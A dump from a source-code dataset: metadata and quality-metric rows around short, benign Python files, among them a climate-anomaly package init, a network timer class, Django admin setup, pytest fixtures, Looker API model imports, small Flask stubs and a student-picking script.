| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.109375
| 0.098592
| 71
| 4
| 45
| 17.75
| 0.59375
| 0
| 0
| 0
| 0
| 0
| 0.128571
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 4
|
4386a3475bdcaa09be9ee0a00c8c410d6943d8d7
| 480
|
py
|
Python
|
contrack/__init__.py
|
kinow/ConTrack
|
04d36581270e59094c11bc3938b79d8c72b8824e
|
[
"MIT"
] | 41
|
2020-06-23T17:18:22.000Z
|
2022-01-23T11:02:43.000Z
|
contrack/__init__.py
|
kinow/ConTrack
|
04d36581270e59094c11bc3938b79d8c72b8824e
|
[
"MIT"
] | 2
|
2020-11-01T14:01:10.000Z
|
2020-11-04T09:45:21.000Z
|
contrack/__init__.py
|
kinow/ConTrack
|
04d36581270e59094c11bc3938b79d8c72b8824e
|
[
"MIT"
] | 11
|
2020-06-23T16:05:57.000Z
|
2021-01-28T07:22:40.000Z
|
"""
Description
-----------
The contrack package provides classes and functions to read, write, plot and
analyze circulation anomalies in weather and climate data.
Content
-------
The following classes are available:
contrack: To create a contrack object with functions to detect and track circulation anomalies
Examples
--------
>>> filename = 'era5_clim_z500.nc'
>>> blocking = contrack()
>>> blocking.read(filename)
"""
from .contrack import contrack # noqa
| 17.777778
| 100
| 0.70625
| 57
| 480
| 5.912281
| 0.701754
| 0.118694
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.010076
| 0.172917
| 480
| 26
| 101
| 18.461538
| 0.838791
| 0.908333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 4
|
438ee556f1bd5d0b76d8988c83c0173d7de3c0cc
| 801
|
py
|
Python
|
submission/ShreshthTuli_2016CS10680_SamarthAggarwal_2016CS10395_LA2/code/timer.py
|
shreshthtuli/Go-Back-N
|
f1f53fee703bda0ea51e62c0fe3b2fdf16161190
|
[
"Apache-2.0"
] | null | null | null |
submission/ShreshthTuli_2016CS10680_SamarthAggarwal_2016CS10395_LA2/code/timer.py
|
shreshthtuli/Go-Back-N
|
f1f53fee703bda0ea51e62c0fe3b2fdf16161190
|
[
"Apache-2.0"
] | null | null | null |
submission/ShreshthTuli_2016CS10680_SamarthAggarwal_2016CS10395_LA2/code/timer.py
|
shreshthtuli/Go-Back-N
|
f1f53fee703bda0ea51e62c0fe3b2fdf16161190
|
[
"Apache-2.0"
] | null | null | null |
# timer.py - A timer class
import time
class Timer(object):
    """Simple count-down timer with explicit start/stop.

    The timer is considered running once start() is called and times out
    after ``duration`` seconds have elapsed.
    """

    # Sentinel stored in _start_time while the timer is not running.
    TIMER_STOP = -1

    def __init__(self, duration):
        self._start_time = self.TIMER_STOP  # not running initially
        self._duration = duration           # timeout length, in seconds

    # Starts the timer (no-op if already running)
    def start(self):
        if self._start_time == self.TIMER_STOP:
            # time.monotonic() cannot jump when the system clock is adjusted,
            # unlike time.time(), so elapsed-time arithmetic stays correct.
            self._start_time = time.monotonic()

    # Stops the timer (no-op if not running)
    def stop(self):
        if self._start_time != self.TIMER_STOP:
            self._start_time = self.TIMER_STOP

    # Determines whether the timer is running
    def running(self):
        return self._start_time != self.TIMER_STOP

    # Determines whether the timer timed out (always False when stopped)
    def timeout(self):
        if not self.running():
            return False
        else:
            return time.monotonic() - self._start_time >= self._duration
| 25.03125
| 67
| 0.619226
| 103
| 801
| 4.563107
| 0.291262
| 0.134043
| 0.193617
| 0.217021
| 0.444681
| 0.444681
| 0.444681
| 0.380851
| 0.380851
| 0.380851
| 0
| 0.001773
| 0.29588
| 801
| 31
| 68
| 25.83871
| 0.83156
| 0.171036
| 0
| 0.105263
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.263158
| false
| 0
| 0.052632
| 0.052632
| 0.578947
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 4
|
78e4aa0b9ca6977d1dfaaf04a8cbaf7dce390645
| 87
|
py
|
Python
|
backend/server/apps/ml/income_classifier/__init__.py
|
goowei/ML_service
|
4cc761fdb7c8384939aea2b94a4ecbf8e7ffb260
|
[
"MIT"
] | null | null | null |
backend/server/apps/ml/income_classifier/__init__.py
|
goowei/ML_service
|
4cc761fdb7c8384939aea2b94a4ecbf8e7ffb260
|
[
"MIT"
] | null | null | null |
backend/server/apps/ml/income_classifier/__init__.py
|
goowei/ML_service
|
4cc761fdb7c8384939aea2b94a4ecbf8e7ffb260
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Created on Tue Jun 23 11:04:19 2020
@author: William
"""
| 10.875
| 35
| 0.574713
| 14
| 87
| 3.571429
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.188406
| 0.206897
| 87
| 7
| 36
| 12.428571
| 0.536232
| 0.873563
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 4
|
78fe44e3574b1e3689fa0cbf32e95873e97dcd84
| 116
|
py
|
Python
|
lender_app/admin.py
|
danhuyle508/django_lender
|
741cf687948b2f292c8fe78cc343be868de34fa5
|
[
"MIT"
] | null | null | null |
lender_app/admin.py
|
danhuyle508/django_lender
|
741cf687948b2f292c8fe78cc343be868de34fa5
|
[
"MIT"
] | null | null | null |
lender_app/admin.py
|
danhuyle508/django_lender
|
741cf687948b2f292c8fe78cc343be868de34fa5
|
[
"MIT"
] | null | null | null |
from django.contrib import admin
from .models import Book
# Register your models here.
# register() accepts a model class directly; the original one-element tuple
# `(Book, )` was equivalent but needlessly obscure.
admin.site.register(Book)
| 29
| 32
| 0.784483
| 17
| 116
| 5.352941
| 0.647059
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.12069
| 116
| 4
| 33
| 29
| 0.892157
| 0.224138
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 4
|
78fed2d009c970de2dcbd9e1b7bc525a8988cf2f
| 701
|
py
|
Python
|
tests/integration/services/ticketing/conftest.py
|
GSH-LAN/byceps
|
ab8918634e90aaa8574bd1bb85627759cef122fe
|
[
"BSD-3-Clause"
] | null | null | null |
tests/integration/services/ticketing/conftest.py
|
GSH-LAN/byceps
|
ab8918634e90aaa8574bd1bb85627759cef122fe
|
[
"BSD-3-Clause"
] | null | null | null |
tests/integration/services/ticketing/conftest.py
|
GSH-LAN/byceps
|
ab8918634e90aaa8574bd1bb85627759cef122fe
|
[
"BSD-3-Clause"
] | null | null | null |
"""
:Copyright: 2006-2021 Jochen Kupperschmidt
:License: Revised BSD (see `LICENSE` file for details)
"""
import pytest
@pytest.fixture(scope='package')
def category(make_ticket_category, party):
    """Package-scoped 'Premium' ticket category for the test party."""
    return make_ticket_category(party.id, 'Premium')
@pytest.fixture(scope='package')
def another_category(make_ticket_category, party):
    """Package-scoped 'Economy' ticket category for the test party."""
    return make_ticket_category(party.id, 'Economy')
@pytest.fixture(scope='package')
def ticketing_admin(make_user):
    """Package-scoped user named 'TicketingAdmin'."""
    return make_user('TicketingAdmin')
@pytest.fixture(scope='package')
def ticket_manager(make_user):
    """Package-scoped user named 'TicketManager'."""
    return make_user('TicketManager')
@pytest.fixture(scope='package')
def ticket_owner(make_user):
    """Package-scoped user named 'TicketOwner'."""
    return make_user('TicketOwner')
| 21.90625
| 54
| 0.761769
| 89
| 701
| 5.797753
| 0.393258
| 0.093023
| 0.174419
| 0.242248
| 0.662791
| 0.372093
| 0.24031
| 0.24031
| 0.24031
| 0.24031
| 0
| 0.0128
| 0.108417
| 701
| 31
| 55
| 22.612903
| 0.8128
| 0.138374
| 0
| 0.3125
| 0
| 0
| 0.145973
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.3125
| false
| 0
| 0.0625
| 0.3125
| 0.6875
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 4
|
600a69191d24b3f3ce88dc9990c47a150348185c
| 12,515
|
py
|
Python
|
lookerapi/models/__init__.py
|
jcarah/python_sdk
|
3bff34d04a828c940c3f93055e10b6a0095c2327
|
[
"MIT"
] | null | null | null |
lookerapi/models/__init__.py
|
jcarah/python_sdk
|
3bff34d04a828c940c3f93055e10b6a0095c2327
|
[
"MIT"
] | null | null | null |
lookerapi/models/__init__.py
|
jcarah/python_sdk
|
3bff34d04a828c940c3f93055e10b6a0095c2327
|
[
"MIT"
] | null | null | null |
# coding: utf-8
"""
Looker API 3.1 Reference
### Authorization The Looker API uses Looker **API3** credentials for authorization and access control. Looker admins can create API3 credentials on Looker's **Admin/Users** page. Pass API3 credentials to the **/login** endpoint to obtain a temporary access_token. Include that access_token in the Authorization header of Looker API requests. For details, see [Looker API Authorization](https://looker.com/docs/r/api/authorization) ### Client SDKs The Looker API is a RESTful system that should be usable by any programming language capable of making HTTPS requests. Client SDKs for a variety of programming languages can be generated from the Looker API's Swagger JSON metadata to streamline use of the Looker API in your applications. A client SDK for Ruby is available as an example. For more information, see [Looker API Client SDKs](https://looker.com/docs/r/api/client_sdks) ### Try It Out! The 'api-docs' page served by the Looker instance includes 'Try It Out!' buttons for each API method. After logging in with API3 credentials, you can use the \"Try It Out!\" buttons to call the API directly from the documentation page to interactively explore API features and responses. Note! With great power comes great responsibility: The \"Try It Out!\" button makes API calls to your live Looker instance. Be especially careful with destructive API operations such as `delete_user` or similar. There is no \"undo\" for API operations. ### Versioning Future releases of Looker will expand this API release-by-release to securely expose more and more of the core power of Looker to API client applications. API endpoints marked as \"beta\" may receive breaking changes without warning (but we will try to avoid doing that). Stable (non-beta) API endpoints should not receive breaking changes in future releases. For more information, see [Looker API Versioning](https://looker.com/docs/r/api/versioning) This **API 3.1** is in active development. 
This is where support for new Looker features will appear as non-breaking additions - new functions, new optional parameters on existing functions, or new optional properties in existing types. Additive changes should not impact your existing application code that calls the Looker API. Your existing application code will not be aware of any new Looker API functionality until you choose to upgrade your app to use a newer Looker API client SDK release. The following are a few examples of noteworthy items that have changed between API 3.0 and API 3.1. For more comprehensive coverage of API changes, please see the release notes for your Looker release. ### Examples of new things added in API 3.1: * Dashboard construction APIs * Themes and custom color collections APIs * Create and run SQL_runner queries * Create and run merged results queries * Create and modify dashboard filters * Create and modify password requirements ### Deprecated in API 3.0 The following functions and properties have been deprecated in API 3.0. They continue to exist and work in API 3.0 for the next several Looker releases but they have not been carried forward to API 3.1: * Dashboard Prefetch functions * User access_filter functions * User API 1.0 credentials functions * Space.is_root and Space.is_user_root properties. Use Space.is_shared_root and Space.is_users_root instead. ### Semantic changes in API 3.1: * `all_looks` no longer includes soft-deleted looks, matching `all_dashboards` behavior. You can find soft-deleted looks using `search_looks` with the `deleted` param set to True. * `all_spaces` no longer includes duplicate items * `search_users` no longer accepts Y,y,1,0,N,n for Boolean params, only \"true\" and \"false\". * For greater client and network compatibility, `render_task_results` now returns HTTP status ***202 Accepted*** instead of HTTP status ***102 Processing*** * `all_running_queries` and `kill_query` functions have moved into the `Query` function group. 
If you have application code which relies on the old behavior of the APIs above, you may continue using the API 3.0 functions in this Looker release. We strongly suggest you update your code to use API 3.1 analogs as soon as possible.
OpenAPI spec version: 3.1.0
Contact: support@looker.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
# import models into model package
from .access_token import AccessToken
from .api_session import ApiSession
from .api_version import ApiVersion
from .api_version_element import ApiVersionElement
from .backup_configuration import BackupConfiguration
from .color_collection import ColorCollection
from .color_stop import ColorStop
from .content_favorite import ContentFavorite
from .content_meta import ContentMeta
from .content_meta_group_user import ContentMetaGroupUser
from .content_validation import ContentValidation
from .content_validation_dashboard import ContentValidationDashboard
from .content_validation_dashboard_element import ContentValidationDashboardElement
from .content_validation_dashboard_filter import ContentValidationDashboardFilter
from .content_validation_look import ContentValidationLook
from .content_validation_space import ContentValidationSpace
from .content_validator_error import ContentValidatorError
from .content_view import ContentView
from .continuous_palette import ContinuousPalette
from .create_dashboard_filter import CreateDashboardFilter
from .create_dashboard_render_task import CreateDashboardRenderTask
from .create_query_task import CreateQueryTask
from .credentials_api3 import CredentialsApi3
from .credentials_email import CredentialsEmail
from .credentials_embed import CredentialsEmbed
from .credentials_google import CredentialsGoogle
from .credentials_ldap import CredentialsLDAP
from .credentials_looker_openid import CredentialsLookerOpenid
from .credentials_oidc import CredentialsOIDC
from .credentials_saml import CredentialsSaml
from .credentials_totp import CredentialsTotp
from .db_connection import DBConnection
from .db_connection_base import DBConnectionBase
from .db_connection_override import DBConnectionOverride
from .db_connection_test_result import DBConnectionTestResult
from .dashboard import Dashboard
from .dashboard_base import DashboardBase
from .dashboard_element import DashboardElement
from .dashboard_filter import DashboardFilter
from .dashboard_layout import DashboardLayout
from .dashboard_layout_component import DashboardLayoutComponent
from .data_action_form import DataActionForm
from .data_action_form_field import DataActionFormField
from .data_action_form_select_option import DataActionFormSelectOption
from .data_action_request import DataActionRequest
from .data_action_response import DataActionResponse
from .data_action_user_state import DataActionUserState
from .datagroup import Datagroup
from .dialect import Dialect
from .dialect_info import DialectInfo
from .dialect_info_options import DialectInfoOptions
from .discrete_palette import DiscretePalette
from .error import Error
from .folder import Folder
from .git_branch import GitBranch
from .git_connection_test import GitConnectionTest
from .git_connection_test_result import GitConnectionTestResult
from .git_status import GitStatus
from .group import Group
from .group_id_for_group_inclusion import GroupIdForGroupInclusion
from .group_id_for_group_user_inclusion import GroupIdForGroupUserInclusion
from .homepage import Homepage
from .homepage_item import HomepageItem
from .homepage_section import HomepageSection
from .imported_project import ImportedProject
from .integration import Integration
from .integration_hub import IntegrationHub
from .integration_param import IntegrationParam
from .integration_required_field import IntegrationRequiredField
from .integration_test_result import IntegrationTestResult
from .internal_help_resources import InternalHelpResources
from .internal_help_resources_content import InternalHelpResourcesContent
from .ldap_config import LDAPConfig
from .ldap_config_test_issue import LDAPConfigTestIssue
from .ldap_config_test_result import LDAPConfigTestResult
from .ldap_group_read import LDAPGroupRead
from .ldap_group_write import LDAPGroupWrite
from .ldap_user import LDAPUser
from .ldap_user_attribute_read import LDAPUserAttributeRead
from .ldap_user_attribute_write import LDAPUserAttributeWrite
from .legacy_feature import LegacyFeature
from .locale import Locale
from .localization_settings import LocalizationSettings
from .look import Look
from .look_basic import LookBasic
from .look_model import LookModel
from .look_with_dashboards import LookWithDashboards
from .look_with_query import LookWithQuery
from .lookml_model import LookmlModel
from .lookml_model_explore import LookmlModelExplore
from .lookml_model_explore_access_filter import LookmlModelExploreAccessFilter
from .lookml_model_explore_alias import LookmlModelExploreAlias
from .lookml_model_explore_always_filter import LookmlModelExploreAlwaysFilter
from .lookml_model_explore_conditionally_filter import LookmlModelExploreConditionallyFilter
from .lookml_model_explore_error import LookmlModelExploreError
from .lookml_model_explore_field import LookmlModelExploreField
from .lookml_model_explore_field_enumeration import LookmlModelExploreFieldEnumeration
from .lookml_model_explore_field_map_layer import LookmlModelExploreFieldMapLayer
from .lookml_model_explore_field_sql_case import LookmlModelExploreFieldSqlCase
from .lookml_model_explore_field_time_interval import LookmlModelExploreFieldTimeInterval
from .lookml_model_explore_fieldset import LookmlModelExploreFieldset
from .lookml_model_explore_joins import LookmlModelExploreJoins
from .lookml_model_explore_set import LookmlModelExploreSet
from .lookml_model_explore_supported_measure_type import LookmlModelExploreSupportedMeasureType
from .lookml_model_nav_explore import LookmlModelNavExplore
from .manifest import Manifest
from .merge_fields import MergeFields
from .merge_query import MergeQuery
from .merge_query_source_query import MergeQuerySourceQuery
from .model_set import ModelSet
from .models_not_validated import ModelsNotValidated
from .oidc_config import OIDCConfig
from .oidc_group_read import OIDCGroupRead
from .oidc_group_write import OIDCGroupWrite
from .oidc_user_attribute_read import OIDCUserAttributeRead
from .oidc_user_attribute_write import OIDCUserAttributeWrite
from .password_config import PasswordConfig
from .permission import Permission
from .permission_set import PermissionSet
from .project import Project
from .project_error import ProjectError
from .project_file import ProjectFile
from .project_validation import ProjectValidation
from .project_validation_cache import ProjectValidationCache
from .project_workspace import ProjectWorkspace
from .query import Query
from .query_task import QueryTask
from .render_task import RenderTask
from .repository_credential import RepositoryCredential
from .result_maker_filterables import ResultMakerFilterables
from .result_maker_filterables_listen import ResultMakerFilterablesListen
from .result_maker_with_id_vis_config_and_dynamic_fields import ResultMakerWithIdVisConfigAndDynamicFields
from .role import Role
from .running_queries import RunningQueries
from .saml_config import SamlConfig
from .saml_group_read import SamlGroupRead
from .saml_group_write import SamlGroupWrite
from .saml_metadata_parse_result import SamlMetadataParseResult
from .saml_user_attribute_read import SamlUserAttributeRead
from .saml_user_attribute_write import SamlUserAttributeWrite
from .scheduled_plan import ScheduledPlan
from .scheduled_plan_destination import ScheduledPlanDestination
from .session import Session
from .session_config import SessionConfig
from .snippet import Snippet
from .space import Space
from .space_base import SpaceBase
from .sql_query import SqlQuery
from .sql_query_create import SqlQueryCreate
from .theme import Theme
from .theme_settings import ThemeSettings
from .timezone import Timezone
from .user import User
from .user_attribute import UserAttribute
from .user_attribute_group_value import UserAttributeGroupValue
from .user_attribute_with_value import UserAttributeWithValue
from .user_id_only import UserIdOnly
from .user_public import UserPublic
from .validation_error import ValidationError
from .validation_error_detail import ValidationErrorDetail
from .whitelabel_configuration import WhitelabelConfiguration
from .workspace import Workspace
| 69.916201
| 4,190
| 0.857851
| 1,642
| 12,515
| 6.35201
| 0.329476
| 0.016299
| 0.024449
| 0.03164
| 0.031927
| 0.012081
| 0
| 0
| 0
| 0
| 0
| 0.003942
| 0.10811
| 12,515
| 178
| 4,191
| 70.308989
| 0.930478
| 0.349181
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.006135
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 4
|
6022fde4b37a81b75c4803b33e1b6a0251c82491
| 123
|
py
|
Python
|
module2/__init__.py
|
LawAlias/gisflask
|
4fb2ae3bb4b7717b86a6fa816db2fc338ebd574e
|
[
"Apache-2.0"
] | 17
|
2019-03-22T01:01:10.000Z
|
2022-03-03T09:56:51.000Z
|
module2/__init__.py
|
LawAlias/gisflask
|
4fb2ae3bb4b7717b86a6fa816db2fc338ebd574e
|
[
"Apache-2.0"
] | null | null | null |
module2/__init__.py
|
LawAlias/gisflask
|
4fb2ae3bb4b7717b86a6fa816db2fc338ebd574e
|
[
"Apache-2.0"
] | 12
|
2019-03-22T13:30:23.000Z
|
2020-05-15T05:36:17.000Z
|
#coding:utf-8
from flask import Flask
from main import app
app.config.from_pyfile('settings.py')
from module2 import views
| 20.5
| 37
| 0.804878
| 21
| 123
| 4.666667
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.018349
| 0.113821
| 123
| 5
| 38
| 24.6
| 0.880734
| 0.097561
| 0
| 0
| 0
| 0
| 0.1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.75
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 4
|
603a2c6804547adbb8906c813d987d903da39c9c
| 160
|
py
|
Python
|
server/app.py
|
timmypotts/twitter
|
b9e28631cfd0cad867c9612ad597df0910a9fbff
|
[
"MIT"
] | null | null | null |
server/app.py
|
timmypotts/twitter
|
b9e28631cfd0cad867c9612ad597df0910a9fbff
|
[
"MIT"
] | null | null | null |
server/app.py
|
timmypotts/twitter
|
b9e28631cfd0cad867c9612ad597df0910a9fbff
|
[
"MIT"
] | null | null | null |
from flask import Flask, request, jsonify, make_response
import os
import sys
from dotenv import load_dotenv
app = Flask(__name__)
cors = CORS(app, resources=)
| 22.857143
| 56
| 0.79375
| 24
| 160
| 5.041667
| 0.625
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.1375
| 160
| 7
| 57
| 22.857143
| 0.876812
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.666667
| null | null | 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 4
|
604e76ede01ec446c97ad0e90967e2050b4174da
| 212
|
py
|
Python
|
winthingies/runtime.py
|
forensicmatt/PyWindowsThingies
|
000ff216c15ef9cd92924a692fce907ec829bc9d
|
[
"Apache-2.0"
] | 26
|
2019-01-22T07:05:58.000Z
|
2021-11-29T03:37:22.000Z
|
winthingies/runtime.py
|
vsajip/PyWindowsThingies
|
000ff216c15ef9cd92924a692fce907ec829bc9d
|
[
"Apache-2.0"
] | 1
|
2019-03-17T22:56:31.000Z
|
2019-03-20T02:47:00.000Z
|
winthingies/runtime.py
|
vsajip/PyWindowsThingies
|
000ff216c15ef9cd92924a692fce907ec829bc9d
|
[
"Apache-2.0"
] | 2
|
2020-03-16T14:30:49.000Z
|
2020-03-29T01:50:43.000Z
|
import os
from winthingies.process import Process
from winthingies.win32.kernel32 import kernel32
current_process = kernel32.GetCurrentProcess()
CURRENT_PROCESS = Process(
os.getpid(),
current_process
)
| 21.2
| 47
| 0.801887
| 24
| 212
| 6.958333
| 0.416667
| 0.251497
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.043478
| 0.132075
| 212
| 9
| 48
| 23.555556
| 0.86413
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.375
| 0
| 0.375
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 4
|
60a765e542e95ca6f3c4a457c66724b5c386d476
| 486
|
py
|
Python
|
slothql/utils/attr.py
|
karol-gruszczyk/sloth-gql
|
7972adb761b60f14409c2f734473c0a04b8db63c
|
[
"MIT"
] | 2
|
2018-01-07T08:51:27.000Z
|
2018-01-23T16:25:56.000Z
|
slothql/utils/attr.py
|
karol-gruszczyk/sloth-gql
|
7972adb761b60f14409c2f734473c0a04b8db63c
|
[
"MIT"
] | 3
|
2018-01-28T03:41:33.000Z
|
2018-01-28T03:55:00.000Z
|
slothql/utils/attr.py
|
karol-gruszczyk/slothql
|
7972adb761b60f14409c2f734473c0a04b8db63c
|
[
"MIT"
] | null | null | null |
import inspect
def is_magic_name(name: str) -> bool:
return name.startswith('__') and name.endswith('__')
def get_attrs(obj) -> dict:
return {name: getattr(obj, name) for name in dir(obj) if not is_magic_name(name)}
def get_attr_fields(obj) -> dict:
return {
name: getattr(obj, name) for name in dir(obj)
if not is_magic_name(name)
and not inspect.ismethod(getattr(obj, name))
and not inspect.isfunction(getattr(obj, name))
}
| 25.578947
| 85
| 0.652263
| 72
| 486
| 4.222222
| 0.361111
| 0.131579
| 0.184211
| 0.148026
| 0.434211
| 0.434211
| 0.434211
| 0.434211
| 0.434211
| 0.434211
| 0
| 0
| 0.228395
| 486
| 18
| 86
| 27
| 0.810667
| 0
| 0
| 0
| 0
| 0
| 0.00823
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0
| 0.083333
| 0.25
| 0.583333
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 4
|
715dd58ac511596c9a3d1af700b7871b543c875a
| 245
|
py
|
Python
|
PythonExercicios/ex019 - sorteo de item da lista.py
|
laaisfmaia/Exercicios-do-Curso-de-Python
|
bdaaf682db9f058d51d4dd084dab0e095f7e74c3
|
[
"MIT"
] | null | null | null |
PythonExercicios/ex019 - sorteo de item da lista.py
|
laaisfmaia/Exercicios-do-Curso-de-Python
|
bdaaf682db9f058d51d4dd084dab0e095f7e74c3
|
[
"MIT"
] | null | null | null |
PythonExercicios/ex019 - sorteo de item da lista.py
|
laaisfmaia/Exercicios-do-Curso-de-Python
|
bdaaf682db9f058d51d4dd084dab0e095f7e74c3
|
[
"MIT"
] | null | null | null |
import random
a1 = input('Nome do aluno 1: ')
a2 = input('Nome do aluno 2: ')
a3 = input('Nome do aluno 3: ')
a4 = input('Nome do aluno 4: ')
alunos = [a1,a2,a4,a3]
print('O aluno escolhido aleatoriamente foi {}'.format(random.choice(alunos)))
| 27.222222
| 78
| 0.665306
| 41
| 245
| 3.97561
| 0.536585
| 0.220859
| 0.269939
| 0.392638
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.058537
| 0.163265
| 245
| 8
| 79
| 30.625
| 0.736585
| 0
| 0
| 0
| 0
| 0
| 0.436735
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.142857
| 0
| 0.142857
| 0.142857
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 4
|
716897e98f2afc3cf45caa6e32cef4c098540792
| 75
|
py
|
Python
|
python/index.py
|
davidcsally/polyglot-hello-world
|
3940dfc27f3c5eb538e07220feee0b157a5cc998
|
[
"MIT"
] | null | null | null |
python/index.py
|
davidcsally/polyglot-hello-world
|
3940dfc27f3c5eb538e07220feee0b157a5cc998
|
[
"MIT"
] | null | null | null |
python/index.py
|
davidcsally/polyglot-hello-world
|
3940dfc27f3c5eb538e07220feee0b157a5cc998
|
[
"MIT"
] | null | null | null |
def say_hello(name="world"):
print("hello " + name + "!")
say_hello()
| 15
| 32
| 0.586667
| 10
| 75
| 4.2
| 0.6
| 0.380952
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.186667
| 75
| 4
| 33
| 18.75
| 0.688525
| 0
| 0
| 0
| 0
| 0
| 0.16
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0
| 0
| 0.333333
| 0.333333
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 4
|
716be4f50e048983739386886dec8c4f4fd44890
| 172
|
py
|
Python
|
start.py
|
albertvisser/probreg
|
5f685616221e3261afe0d8ae8506cad9a719fa82
|
[
"MIT"
] | null | null | null |
start.py
|
albertvisser/probreg
|
